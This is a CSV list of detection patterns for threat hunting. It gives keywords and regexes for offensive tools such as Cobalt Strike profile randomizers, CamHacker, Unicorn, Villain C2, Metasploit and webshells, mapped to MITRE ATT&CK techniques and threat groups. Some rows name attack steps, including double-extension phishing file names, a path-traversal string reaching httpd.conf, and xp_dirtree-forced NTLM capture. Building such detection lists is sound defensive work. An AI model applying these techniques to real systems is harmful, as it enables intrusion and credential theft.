"*.support.123456.*",".{0,1000}\.support\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4919"
"*.tor2web *",".{0,1000}\.tor2web\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","4921"
"*.torproject.org/*/download/tor/*",".{0,1000}\.torproject\.org\/.{0,1000}\/download\/tor\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4922"
"*.tunneler/cf.log*",".{0,1000}\.tunneler\/cf\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4925"
"*.tunneler/cloudflared*",".{0,1000}\.tunneler\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4926"
"*.tunneler/loclx*",".{0,1000}\.tunneler\/loclx.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4927"
"*.tunneler/loclx.log*",".{0,1000}\.tunneler\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4928"
"*.txt shellcode hta*",".{0,1000}\.txt\sshellcode\shta.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4930"
"*.txt shellcode macro*",".{0,1000}\.txt\sshellcode\smacro.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4931"
"*.txt shellcode ms*",".{0,1000}\.txt\sshellcode\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4932"
"*.txt.bat*",".{0,1000}\.txt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4933"
"*.txt.dll*",".{0,1000}\.txt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4934"
"*.txt.exe*",".{0,1000}\.txt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4935"
"*.txt.htm*",".{0,1000}\.txt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4936"
"*.txt.iso*",".{0,1000}\.txt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4937"
"*.txt.jar*",".{0,1000}\.txt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4938"
"*.txt.jasmin*",".{0,1000}\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4939"
"*.txt.js",".{0,1000}\.txt\.js","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4940"
"*.txt.sfx*",".{0,1000}\.txt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4941"
"*.txt.vbs*",".{0,1000}\.txt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4942"
"*.unconstrained.txt*",".{0,1000}\.unconstrained\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4943"
"*.videos.123456.*",".{0,1000}\.videos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4946"
"*.villain_core*",".{0,1000}\.villain_core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","4947"
"*.vpn.123456.*",".{0,1000}\.vpn\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4949"
"*.webmail.123456.*",".{0,1000}\.webmail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4951"
"*.wiki.123456.*",".{0,1000}\.wiki\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4952"
"*.win10.config.fireeye*",".{0,1000}\.win10\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","4953"
"*.win7.config.fireeye*",".{0,1000}\.win7\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","4954"
"*.WriteLine(""SharpRDP"")*",".{0,1000}\.WriteLine\(\""SharpRDP\""\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4955"
"*.xls.bat*",".{0,1000}\.xls\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4957"
"*.xls.dll*",".{0,1000}\.xls\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4958"
"*.xls.exe*",".{0,1000}\.xls\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4959"
"*.xls.htm*",".{0,1000}\.xls\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4960"
"*.xls.iso*",".{0,1000}\.xls\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4961"
"*.xls.jar*",".{0,1000}\.xls\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4962"
"*.xls.js*",".{0,1000}\.xls\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4963"
"*.xls.sfx*",".{0,1000}\.xls\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4964"
"*.xls.vbs*",".{0,1000}\.xls\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4965"
"*.xlsx.bat*",".{0,1000}\.xlsx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4966"
"*.xlsx.dll*",".{0,1000}\.xlsx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4967"
"*.xlsx.exe*",".{0,1000}\.xlsx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4968"
"*.xlsx.htm*",".{0,1000}\.xlsx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4969"
"*.xlsx.iso*",".{0,1000}\.xlsx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4970"
"*.xlsx.jar*",".{0,1000}\.xlsx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4971"
"*.xlsx.jasmin*",".{0,1000}\.xlsx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4972"
"*.xlsx.js*",".{0,1000}\.xlsx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4973"
"*.xlsx.sfx*",".{0,1000}\.xlsx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4974"
"*.xlsx.vbs*",".{0,1000}\.xlsx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4975"
"*.xp_dirtree *\*",".{0,1000}\.xp_dirtree\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful  the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4976"
"*.zip.exe*",".{0,1000}\.zip\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4977"
"*.zip.iso*",".{0,1000}\.zip\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4978"
"*/#kali-installer-images*",".{0,1000}\/\#kali\-installer\-images.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","4982"
"*/*_priv_esc.*",".{0,1000}\/.{0,1000}_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4984"
"*/*SandboxEscapes/*",".{0,1000}\/.{0,1000}SandboxEscapes\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4985"
"*/../../../../../../../../../../../../../../etc/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4986"
